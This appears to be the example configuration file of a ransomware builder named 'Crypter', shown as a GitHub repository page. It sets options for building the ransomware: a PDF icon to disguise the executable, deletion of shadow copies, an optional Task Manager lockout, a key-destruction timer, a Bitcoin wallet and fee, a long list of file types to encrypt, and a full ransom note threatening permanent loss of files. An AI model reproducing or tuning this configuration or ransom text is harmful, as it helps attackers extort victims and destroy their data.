-
Notifications
You must be signed in to change notification settings - Fork 187
/
config_example.cfg
215 lines (215 loc) · 4.81 KB
/
config_example.cfg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
{
"builder_language": "English",
"pyinstaller_aes_key": "",
"icon_file": ".\\CrypterBuilder\\Resources\\pdf.ico",
"open_gui_on_login": true,
"time_delay": "60",
"gui_title": "CRYPTER",
"upx_dir": "",
"delete_shadow_copies": true,
"disable_task_manager": false,
"key_destruction_time": "86400",
"wallet_address": "12mdKVNfAhLbRDLtRWQFhQgydgU6bUMjay",
"bitcoin_fee": "0.08134",
"encrypt_attached_drives": false,
"encrypt_user_home": false,
"max_file_size_to_encrypt": "512",
"filetypes_to_encrypt": [
"dat",
"keychain",
"sdf",
"vcf",
"jpg",
"png",
"tiff",
"tif",
"gif",
"jpeg",
"jif",
"jfif",
"jp2",
"jpx",
"j2k",
"j2c",
"fpx",
"pcd",
"bmp",
"svg",
"3dm",
"3ds",
"max",
"obj",
"dds",
"psd",
"tga",
"thm",
"tif",
"tiff",
"yuv",
"ai",
"eps",
"ps",
"svg",
"indd",
"pct",
"mp4",
"avi",
"mkv",
"3g2",
"3gp",
"asf",
"flv",
"m4v",
"mov",
"mpg",
"rm",
"srt",
"swf",
"vob",
"wmv",
"doc",
"docx",
"txt",
"pdf",
"log",
"msg",
"odt",
"pages",
"rtf",
"tex",
"wpd",
"wps",
"csv",
"ged",
"key",
"pps",
"ppt",
"pptx",
"xml",
"json",
"xlsx",
"xlsm",
"xlsb",
"xls",
"mht",
"mhtml",
"htm",
"html",
"xltx",
"prn",
"dif",
"slk",
"xlam",
"xla",
"ods",
"docm",
"dotx",
"dotm",
"xps",
"ics",
"mp3",
"aif",
"iff",
"m3u",
"m4a",
"mid",
"mpa",
"wav",
"wma",
"msi",
"php",
"apk",
"app",
"bat",
"cgi",
"com",
"asp",
"aspx",
"cer",
"cfm",
"css",
"htm",
"html",
"js",
"jsp",
"rss",
"xhtml",
"c",
"class",
"cpp",
"cs",
"h",
"java",
"lua",
"pl",
"py",
"sh",
"sln",
"swift",
"vb",
"vcxproj",
"dem",
"gam",
"nes",
"rom",
"sav",
"tgz",
"zip",
"rar",
"tar",
"7z",
"cbr",
"deb",
"gz",
"pkg",
"rpm",
"zipx",
"iso",
"ged",
"accdb",
"db",
"dbf",
"mdb",
"sql",
"fnt",
"fon",
"otf",
"ttf",
"cfg",
"ini",
"prf",
"bak",
"old",
"tmp",
"torrent"
],
"encrypted_file_extension": "crypter",
"make_gui_resizeable": true,
"always_on_top": false,
"background_colour": [
177,
7,
14,
255
],
"heading_font_colour": [
0,
0,
0,
255
],
"primary_font_colour": [
255,
255,
0,
255
],
"secondary_font_colour": [
255,
255,
255,
255
],
"ransom_message": "The important files on your computer have been encrypted with military grade AES-256 bit encryption.\n\nYour documents, videos, images and other forms of data are now inaccessible, and cannot be unlocked without the decryption key. This key is currently being stored on a remote server.\n\nTo acquire this key, transfer the Bitcoin Fee to the specified wallet address before the time runs out.\n\nIf you fail to take action within this time window, the decryption key will be destroyed and access to your files will be permanently lost.",
"debug_level": "3 - High"
}